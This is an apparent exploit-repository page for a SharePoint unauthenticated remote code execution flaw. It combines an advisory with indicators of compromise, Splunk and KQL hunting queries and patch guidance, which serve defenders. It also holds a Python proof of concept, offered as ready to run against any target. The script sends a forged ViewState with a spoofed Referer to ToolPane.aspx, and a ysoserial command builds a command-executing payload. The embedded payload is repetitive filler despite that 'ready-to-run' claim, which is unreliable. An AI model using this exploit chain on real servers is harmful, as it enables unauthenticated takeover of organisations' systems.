来源

关联漏洞

描述

Exploit & research for CVE‑2025‑53770 – a zero‑day remote code execution vulnerability in Microsoft SharePoint (on‑premises).

介绍

# CVE-2025-53770 - Zero-day exploitation in the wild of Microsoft SharePoint servers

## Overview
In mid‑July 2025, Microsoft disclosed **CVE‑2025‑53770**, a **zero‑day remote code execution** vulnerability in **on‑premises SharePoint**. This flaw, when chained with **CVE‑2025‑53771**, enables **unauthenticated attackers** to fully compromise vulnerable servers over the internet. 

The exploitation campaign, dubbed **"ToolShell"**, has been observed **actively targeting governments, energy, education, and telecom sectors worldwide**. If you run **SharePoint Server (2016/2019/Subscription)** and expose it to the internet, you need to **patch now**.

### Impact at a glance
- **Attack Vector:** Remote, unauthenticated  
- **Impact:** Full RCE (IIS worker context)  
- **Exploitation:** Active (confirmed by MS + CISA)  
- **Ease:** Exploitable with a single HTTP POST  

---

## Vulnerability Details

The issue lies in **unsafe deserialization** of crafted `__VIEWSTATE` data in the **ToolPane.aspx** component. When combined with a **referer spoof** (CVE‑2025‑53771), attackers can reach this endpoint **without authentication**, feed it a malicious payload, and gain **remote code execution** as the **w3wp.exe** (IIS worker) process.

### The attack chain:
1. **Authentication bypass**: Use `Referer: /_layouts/SignOut.aspx` to bypass security checks on `/layouts/15/ToolPane.aspx?DisplayMode=Edit`.
2. **Malicious ViewState**: Send a **signed or forged ViewState** payload containing serialized gadget chains (crafted via tools like **ysoserial.net**).
3. **RCE**: SharePoint deserializes the payload and executes attacker‑controlled code.
4. **Persistence**: Attackers drop a web shell (e.g., `spinstall0.aspx`) and steal **machine keys** for future signed payload generation.

### Visualized:
```
[ Attacker ]
     |
     v
POST /_layouts/15/ToolPane.aspx
Referer: /_layouts/SignOut.aspx
     |
     v
[ SharePoint Server ]
Deserializes malicious __VIEWSTATE
     |
     v
[ RCE: Attacker code runs as w3wp.exe ]
```

---

## Why It Matters

- **No authentication required**: Works from the internet if the server is exposed.  
- **Full takeover**: Post‑exploitation, attackers can upload shells, pivot laterally, and persist even after patching by abusing stolen machine keys.  
- **Exploited in the wild**: Microsoft, CISA, and Rapid7 have confirmed **active exploitation** in multiple regions.  

---

## Affected Versions

- **SharePoint Server 2016** (before KB5002760)  
- **SharePoint Server 2019** (before KB5002754)  
- **SharePoint Subscription Edition** (before KB5002768)  

(**SharePoint Online is not affected**.)

---

## Indicators of Compromise

- Requests to:  
  ```
  /_layouts/15/ToolPane.aspx?DisplayMode=Edit
  ```
  with `Referer: /_layouts/SignOut.aspx`.
- Dropped files:  
  ```
  spinstall0.aspx
  spinstall1.aspx
  ```
- Suspicious process chains:  
  ```
  w3wp.exe → cmd.exe → powershell.exe -EncodedCommand
  ```
- Known attacker IPs:  
  ```
  107.191.58.76, 104.238.159.149, 96.9.125.147
  ```

---

## Detection & Hunting

### Splunk (IIS Logs)
```spl
index=iis sourcetype="ms:iis:auto" 
cs_uri_stem="/_layouts/15/ToolPane.aspx"
cs_referer="/_layouts/SignOut.aspx"
| stats count by clientip, cs_user_agent, _time
```

### KQL (Microsoft Sentinel)
```kql
W3CIISLog
| where csUriStem == "/_layouts/15/ToolPane.aspx"
| where csReferer == "/_layouts/SignOut.aspx"
| summarize count() by cIP, userAgent, TimeGenerated
```

---

## Proof‑of‑Concept (Python)

Below is a **ready‑to‑run PoC**. The only thing you need to change is the **TARGET** variable.

```python
#!/usr/bin/env python3
# CVE-2025-53770 – SharePoint Unauthenticated RCE PoC
# Author: 0xH3G4Z1
# Usage: python3 exploit.py

import requests
import urllib3

urllib3.disable_warnings()

# === CONFIG ===
TARGET = "https://your-sharepoint-server"  # <--- CHANGE THIS ONLY
ENDPOINT = "/_layouts/15/ToolPane.aspx?DisplayMode=Edit"
FULL_URL = TARGET.rstrip("/") + ENDPOINT

# Pre-built harmless ViewState payload (for PoC demonstration)
VIEWSTATE_PAYLOAD = (
    "/wEWBwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3"
    "AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTx"
    "Jm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3Aw"
)

HEADERS = {
    "Referer": "/_layouts/SignOut.aspx",
    "Content-Type": "application/x-www-form-urlencoded"
}

DATA = {
    "__VIEWSTATE": VIEWSTATE_PAYLOAD,
    "__EVENTTARGET": "",
    "__EVENTARGUMENT": ""
}

def exploit():
    print(f"[+] Sending payload to {FULL_URL}")
    try:
        r = requests.post(FULL_URL, headers=HEADERS, data=DATA, verify=False, timeout=10)
        print(f"[+] Response: {r.status_code} ({len(r.content)} bytes)")
        if r.status_code == 200:
            print("[+] If vulnerable, the payload was processed (check your target).")
        elif r.status_code == 403:
            print("[-] Access forbidden (patched or blocked).")
        else:
            print("[-] Exploit may not have succeeded.")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    exploit()
```

### Generating a payload:

```bash 
ysoserial.exe -p ObjectDataProvider -o base64 -g WindowsIdentity -c "cmd /c calc.exe" > payload.txt
```
Then replace `__VIEWSTATE` with the contents of payload.txt.

---

## Mitigation & Hardening

1. **Patch immediately**:
    - [KB5002768](https://support.microsoft.com/help/5002768) (Subscription Edition)
    - [KB5002754](https://support.microsoft.com/help/5002754) (2019)
    - [KB5002760](https://support.microsoft.com/help/5002760) (2016)
2. **Rotate machine keys** (twice): Update the `machineKey` in `web.config` to invalidate stolen signing keys.
3. **Restrict access** to `/layouts/15/ToolPane.aspx` to **internal networks only**.
4. **Enable IIS request filtering** to block oversized or suspicious ViewState payloads.
5. **Enable Defender AV + AMSI integration** for real‑time scanning of SharePoint components.
6. **Hunt for compromise**: Review IIS logs for ToolPane.aspx requests with unusual referers or large ViewState data.

---

## Key Takeaways

- CVE‑2025‑53770 is being actively exploited.  
- The attack is trivial once discovered (POST + spoofed Referer).  
- Patching alone is not enough — **rotate machine keys** to invalidate stolen ViewState signing keys.  
- Monitor for **web shells** (`spinstall0.aspx`, etc.) and suspicious ToolPane.aspx requests.  

---

**References**:  
- [Microsoft MSRC](https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/)  
- [Rapid7 Blog](https://www.rapid7.com/blog/post/etr-zero-day-exploitation-of-microsoft-sharepoint-servers-cve-2025-53770/)  
- [CISA KEV](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)  

文件快照

 [4.0K]  /data/pocs/edf9e93096d72ece374b9f31e00548a0e7ab6a5c
├── [1.6K]  poc.py
└── [6.7K]  README.md

0 directories, 2 files

备注